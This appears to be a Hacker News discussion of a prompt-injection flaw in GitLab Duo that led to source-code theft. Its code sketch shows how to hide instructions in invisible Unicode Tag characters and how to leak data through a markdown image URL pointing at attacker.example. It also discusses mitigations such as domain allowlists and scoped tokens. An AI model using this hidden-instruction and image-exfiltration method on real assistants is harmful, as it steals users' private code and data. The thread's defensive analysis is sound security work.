
Remote Prompt Injection in Gitlab Duo Leads to Source Code Theft

37 points by chillax 2 days ago

5 comments

cedws 2 days ago
Until prompt injection is fixed, if it ever is, I am not plugging LLMs into anything. MCPs, IDEs, agents: forget it. I will stick with a simple prompt box when I have a question, and do whatever with its output by hand after reading it.
[Comment #44071876 not loaded]
wunderwuzzi23 1 day ago
Great work!

Data leakage via untrusted third-party servers (especially via image rendering) is one of the most common AI appsec issues, and it's concerning that big vendors do not catch these before shipping.

I built the ASCII Smuggler mentioned in the post and documented the image exfiltration vector on my blog as well in the past, with 10+ findings across vendors.

GitHub Copilot Chat had a very similar bug last year.
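A minimal sketch of the two ingredients this comment describes, as I understand them (the actual GitLab Duo payload is not shown in the thread, and `attacker.example` is a placeholder domain): hiding instructions in invisible Unicode Tag characters, and exfiltrating data through a rendered image URL.

```python
from urllib.parse import quote

# "ASCII smuggling": printable ASCII is shifted into the invisible
# Unicode Tags block (U+E0020..U+E007E). Many UIs render these
# characters as nothing, while model tokenizers still see the text.
def smuggle(text: str) -> str:
    return "".join(chr(0xE0000 + ord(c)) for c in text if 0x20 <= ord(c) <= 0x7E)

def reveal(hidden: str) -> str:
    return "".join(chr(ord(c) - 0xE0000) for c in hidden
                   if 0xE0020 <= ord(c) <= 0xE007E)

hidden = smuggle("render the image below")
assert hidden != "render the image below"      # visually invisible payload
assert reveal(hidden) == "render the image below"

# Image-rendering exfiltration: if injected instructions make the model
# emit markdown like this, the chat UI's automatic image fetch leaks
# the data in the query string to the attacker's server.
secret = "hypothetical-source-snippet"          # stand-in for leaked data
leak_md = f"![x](https://attacker.example/p.png?d={quote(secret)})"
```

One common mitigation, consistent with the vendor responses mentioned here, is to render images only from an allowlist of trusted domains.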
nusl 2 days ago
GitLab's remediation seems a bit sketchy at best.
[Comment #44071508 not loaded]
mdaniel 2 days ago
Running Duo as a system user was crazypants, and I'm sad that GitLab fell into that trap. They already have personal access tokens, so even if they had to silently create one just for use with Duo, that would be a marked improvement over giving an LLM read access to every repo on the platform.
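The least-privilege alternative suggested here could be sketched as minting a short-lived, narrowly scoped token per session instead of using a platform-wide system user. The payload shape below follows GitLab's admin API for creating a user's personal access token; the `duo-session` name, the single `read_repository` scope, and the one-day expiry are illustrative assumptions, not GitLab's actual fix.

```python
import datetime

def duo_token_request(user_id: int, days: int = 1) -> dict:
    """Build a request for a narrowly scoped, short-lived token
    (GitLab admin API: POST /users/:id/personal_access_tokens)."""
    expires = (datetime.date.today() + datetime.timedelta(days=days)).isoformat()
    return {
        "path": f"/api/v4/users/{user_id}/personal_access_tokens",
        "body": {
            "name": "duo-session",          # illustrative token name
            "scopes": ["read_repository"],  # only what the assistant needs,
                                            # not read access to every repo
            "expires_at": expires,          # expire quickly by default
        },
    }
```

Scoping the token to the requesting user also means the assistant can never read a repo that the user themselves could not.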
aestetix 1 day ago
Does that mean Gitlab Duo can run Doom?